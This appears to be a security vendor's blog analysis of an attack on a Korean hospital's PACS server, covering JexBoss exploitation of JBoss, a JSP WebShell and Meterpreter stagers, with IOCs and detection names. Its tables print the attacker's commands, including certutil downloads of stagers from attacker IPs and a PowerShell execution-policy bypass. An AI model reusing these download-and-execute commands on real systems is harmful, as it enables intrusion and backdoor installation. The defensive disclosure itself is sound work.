Meterpreter Distributed to Vulnerable Server of Korean Medical Institution

While monitoring malware strains distributed to vulnerable servers, the ASEC analysis team discovered an attack case for PACS (Picture Archiving and Communication System) server used by Korean medical institutions.

PACS is a system for digitally managing and transferring medical images of patients, which is used to check and interpret the images without being restrained by time and space.

This system is thus used by many hospitals. As there are multiple PACS vendors, each medical institution may use different PACS systems.

The case presented in this article was an attack against a product that configured its server using a JAVA-based open-source application called ‘dcm4che‘.

Figure 1. Official website of ‘dcm4che’ (https://www.dcm4che.org/)

dcm4che is an open-source program that supports the processing of medical images by helping with their conversion and management. It provides a web interface for management and allows the user to configure a PACS server without much difficulty. The web container used in the process is JBoss Application.

The attacker targeted a vulnerable server of JBoss Application using a tool called ‘JexBoss.’

Figure 2. Vulnerable JBoss Application Server confirmed via Shodan (https://www.shodan.io/)

JexBoss (JBoss Verify and EXploitation tool) is a vulnerability exploitation tool available on GitHub. Its targets include JBoss Application Server as well as various other Java platforms, frameworks, and applications. JexBoss supports vulnerability scanning of the Java-based environments mentioned above. If there is a vulnerability, it can attack and install a WebShell to gain control of the system.

Figure 3. JexBoss on GitHub (https://github.com/joaomatosf/jexboss)

As JexBoss is an open-source program, it is used by many different attackers due to its accessibility. In 2016, for instance, the SamSam ransomware attacker group attacked and installed ransomware on the JBoss server that was not patched with the vulnerability.

[Reference] Ransomware Attack Case in 2016

In the case presented in this post, the attacker installed a WebShell using JexBoss and ultimately installed Meterpreter Backdoor after reconnaissance.

The attacker can use the Jexboss tool to dominate the system if the JBoss environment did not change the default account credentials or has been using previous versions that were not applied with the vulnerability patch. JexBoss can scan the received address to show the result and install a WebShell without much difficulty.

Figure 4. Log of installing a WebShell using JexBoss (Source: JexBoss GitHub)

After scanning with JexBoss, the attacker can perform a vulnerability attack based on the scanning results. The image below shows AhnLab’s ASD log of the attacker installing a WebShell in the system through a vulnerability attack supported by JexBoss. The vulnerable ‘javaservice.exe‘ process installs a WebShell from the URL provided by JexBoss. The WebShell is inside the war file, which is a Java web application file.

Figure 5. Log of WebShell being installed via JexBoss

The WebShell made with JSP performs the commands received from the attacker in the infected system using ‘cmd.exe’ or ‘bash’ depending on the OS (Windows or Linux).

Figure 6. JSP WebShell installed in the infected environment

After the WebShell was installed, the attacker entered the commands. The net command was used to obtain the list of user accounts in the infected environment and remove the user named ‘smoke’. Following that, the attacker used the tasklist command to check the list of the currently running processes.

DateExecution Path and CommandDescription
June 21st, 2022 11:24(JexBoss)
d:\pacs\dcm4chee-mysql-2.14.5\server\default\tmp\%ASD%\tmp2292506501108616935jexws4.war
Downloads WebShell
June 21st, 2022 11:25%SystemRoot%\syswow64\net.exe > net userShows account credentials
June 21st, 2022 11:25%SystemRoot%\syswow64\net.exe > net user smoke /delDeletes ‘smoke’ account
June 21st, 2022 11:26%SystemRoot%\syswow64\tasklist.exe > tasklistShows the list of processes
Table 1. Commands performed by the attacker (1)

The attacker also made the following attempts to install Meterpreter. The table below is a log of downloading PE (executable) and PowerShell-format Metasploit Stager by abusing certutil.exe.

TimePath and CommandDescription
June 21st, 2022 11:28%SystemRoot%\syswow64\certutil.exe
> -urlcache -split -f “hxxp://62.138.7[.]234:2468/de4444.bat” de.bat
(Unconfirmed)
June 21st, 2022 11:29%SystemRoot%\syswow64\certutil.exe
> -urlcache -split -f “hxxp://62.138.7[.]234:2468/de4444.exe” w.exe
Downloads Meterpreter Stager
(PE executable)
June 21st, 2022 11:32%SystemRoot%\syswow64\certutil.exe
> -urlcache -split -f “hxxp://34.220.245[.]178/de.ps1” w.ps1
Downloads Meterpreter Stager
(PowerShell Script)
June 21st, 2022 11:32%SystemRoot%\syswow64\windowspowershell\v1.0\powershell.exe
> -executionpolicy bypass -noexit -file w.ps1
Attempts to download Meterpreter Stager
(PowerShell Script)
Table 2. Commands performed by the attacker (2)

‘de4444.exe’ is Metasploit Stager, a PE-format malware that accesses the C&C server to download the Meterpreter payload in the memory and execute it. As Stager allows attackers to download payloads that perform the feature of a backdoor when needed, its form is simple and can be used for attacks even in a small size.

Figure 7. Stager malware (de4444.exe) downloading Meterpreter

Although ‘w.ps1’ is currently not found, it is likely to be a powershell-format Stager according to AhnLab’s ASD log. As its features are the same as those of the PE-format Stager, Meterpreter is executed in the memory of the powershell.exe process. The following is a log of Meterpreter loaded in the powershell process communicating with the C&C server after being injected into the winlogon process.

Figure 8. Meterpreter ASD log

Meterpreter is a backdoor malware that can receive an attacker’s command from the C&C server and perform malicious features. In other words, once Meterpreter is installed, the attacker can gain complete control over the infected system using the Metasploit framework.

Therefore, administrators should change account credentials that are set to default and prevent vulnerability attacks by updating the server to the newest version for vulnerability patches. For public servers, it is also necessary to control external access via security products.

AhnLab’s anti-malware software, V3, detects and blocks the malware using the following aliases:

[Detection]

File Detection

  • Downloader/Win.Meterpreter
  • WebShell/JSP.Generic

Behavior Detection

  • Malware/MDP.Download.M1900

[IOC]

MD5

  • 3f156bd68b2a32a1b5cb03af318667f0 (jews.war)
  • acda46759d7c3526df2a6c59803586a4 (jexws4.jsp)
  • 8fe01532bfa9803f1a9b174289c2cbbc (de4444.exe)

URL & C2

  • 62.138.7[.]234:4444
  • hxxp://62.138.7[.]234:2468
  • hxxp://34.220.245[.]178/de.ps1
  • hxxp://62.138.7[.]234:5555

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Reference

https://www.dcm4che.org/
https://github.com/joaomatosf/jexboss
https://www.cisa.gov/uscert/ncas/analysis-reports/AR18-312A

5 2 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments